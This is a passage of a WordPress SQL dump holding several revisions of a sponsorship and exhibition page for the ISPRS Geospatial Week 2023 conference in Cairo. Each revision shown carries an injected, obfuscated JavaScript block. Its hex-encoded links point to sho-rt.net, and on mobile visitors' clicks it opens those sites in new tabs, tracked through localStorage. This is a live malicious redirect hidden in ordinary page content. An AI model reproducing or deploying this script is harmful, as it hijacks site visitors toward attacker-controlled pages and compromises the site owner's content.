_0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:45:39','2023-03-23 03:45:39','',2920,'https://gsw2023.com/?p=3939',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(3940,1,'2023-03-23 03:49:26','2023-03-23 03:49:26','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"1000x1000\" alignment=\"center\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">12:00-17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition Opening</span></p>\n<p><span style=\"font-size: 10pt;\">Welcome Reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 4</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 17:00</span></p>\n<p><span style=\"font-size: 10pt;\">18:00 – 20:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Exhibitors’ reception</span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 5</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\">9:00 – 15:00</span></p>\n<p><span style=\"font-size: 10pt;\">15:00 – 18:00</span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\">Exhibition</span></p>\n<p><span style=\"font-size: 10pt;\">Dismantle Exhibition</span></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n<p><span style=\"font-size: 10pt;\">The Organizing Committee reserves the right to change these times to better fit the final program if necessary. Allocation of the booths will be on a first-come-first-served basis upon receiving the confirmation and payment, with preference given to the companies who request multiple booths</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">INFORMATION</span></h1>\n<p><span style=\"font-size: 10pt;\">For more information visit the Geospatial Week 2023 website: www.gsw2023.com or contact the organizing committee by mail (<a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> ).</span>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2023-03-23 03:49:26','2023-03-23 03:49:26','',2920,'https://gsw2023.com/?p=3940',0,'revision','',0),
(3941,1,'2023-03-23 03:51:10','2023-03-23 03:51:10','<p>[vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">ISPRS GEOSPATIAL WEEK 2023</span></h1>\n<h2 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">SPONSORSHIP AND EXHIBITION ,</span><span style=\"font-size: 18pt;\">Cairo – Egypt 2-7 September 2023</span></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]<span style=\"font-size: 10pt;\">The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</span></p>\n<p><span style=\"font-size: 10pt;\">The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series of dedicated workshops. More information regarding ISPRS can be found at: http://www.isprs.org/.</span></p>\n<p><span style=\"font-size: 10pt;\">An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</span></p>\n<p><span style=\"font-size: 10pt;\">A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> for more details on the sponsorship opportunities for the GSW/2023.</span></p>\n<p><span style=\"font-size: 10pt;\">We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 Organizing Committee.</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"chino\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>SPONSORSHIP AND EXHIBITION PACKAGES</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">Sponsorship options include the opportunity to give oral presentations about your company’s products, exhibition booths, live demonstrations and the ability to give a half-day interactive tutorial of your software or product on Sunday. More information regarding the various packages and additional à la carte options is given below. If you would like to discuss other sponsorship options or tailor-made packages, please contact the GSW Director Prof. Naser El-Sheimy at <a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a> or Prof. Amr Hanafi at <a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a> or Prof Alaa Abd El Bary <a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a> or <a href=\"https://gsw2023.com/index.html\">info@gsw2023.com</a> .</span>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3933\" img_size=\"1800x2200\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"black\" style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner][vc_column_text]</p>\n<h5><span style=\"font-size: 12pt;\"><strong>Venue - INTERCONTINENTAL  CAIRO SEMIRAMIS</strong></span></h5>\n<p><span style=\"font-size: 10pt;\">(<a href=\"https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined\">https://www.ihg.com/intercontinental/hotels/gb/en/cairo/croha/hoteldetail#scmisc=nav_hoteldetail_undefined</a>)</span></p>\n<p><span style=\"font-size: 10pt;\">The GSW2023 will take place on the historic Semiramis hotel site, guests can enjoy modern luxury on the River Nile. This Cairo hotel features a rooftop pool, fine dining with exquisite cuisine for every taste, conference facilities, a state-of-the-art Spa, a shopping arcade, with the Nile Terrace offering stunning views of the sunset over the Nile. Located at a premium location in the heart of the city center, the hotel offers complimentary WIFI and is located next to the Egyptian Museum and bazaars of old Cairo.</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row][vc_column][vc_single_image image=\"3936\" img_size=\"1200x1200\" alignment=\"center\" style=\"vc_box_shadow_3d\" image_hovers=\"false\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>SPONSORSHIP TIMETABLE AND DEADLINES</h5>\n<p><span style=\"font-size: 10pt;\">Upon registration, the sponsor’s logo and level of support will be published on the GSW2023 website.</span></p>\n<ul>\n<li><span style=\"font-size: 10pt;\">May 1, 2023 Deadline for sponsorship confirmation and payment</span></li>\n<li><span style=\"font-size: 10pt;\">June 1, 2013 Delivery of sponsorship material to be included in conference bags to:</span></li>\n</ul>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span><span style=\"font-size: 10pt;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Heliopolis Campus</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Re: ISPRS GSW’2023</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>ATT: Prof. Alla Abdelbary</strong></span></p>\n<p><span style=\"font-size: 10pt;\">P.O. Box 2033 -Elhorria El Moshir Ismail st.-behind Sheraton Bldg. </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685616 - 22685615 </span></p>\n<p><span style=\"font-size: 10pt;\">(+202) 22685892</span></p>\n<p>&nbsp;</p>\n<h1><span style=\"font-size: 12pt;\">CONFERENCE PROGRAM FOR EXHIBITORS</span></h1>\n<p>&nbsp;</p>\n<table>\n<tbody>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 2</strong></span></td>\n<td width=\"189\"><p><span style=\"font-size: 10pt;\"><strong>9:00 – 5:00</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong> </strong></span></td>\n<td width=\"217\"><p><span style=\"font-size: 10pt;\"><strong>Tutorial Day</strong></span></p>\n<p><span style=\"font-size: 10pt;\"><strong>Exhibition Setup</strong></span></td>\n</tr>\n<tr>\n<td width=\"170\"><span style=\"font-size: 10pt;\"><strong>September 3</strong></span></td>\n<td width=\"189\"><p><span 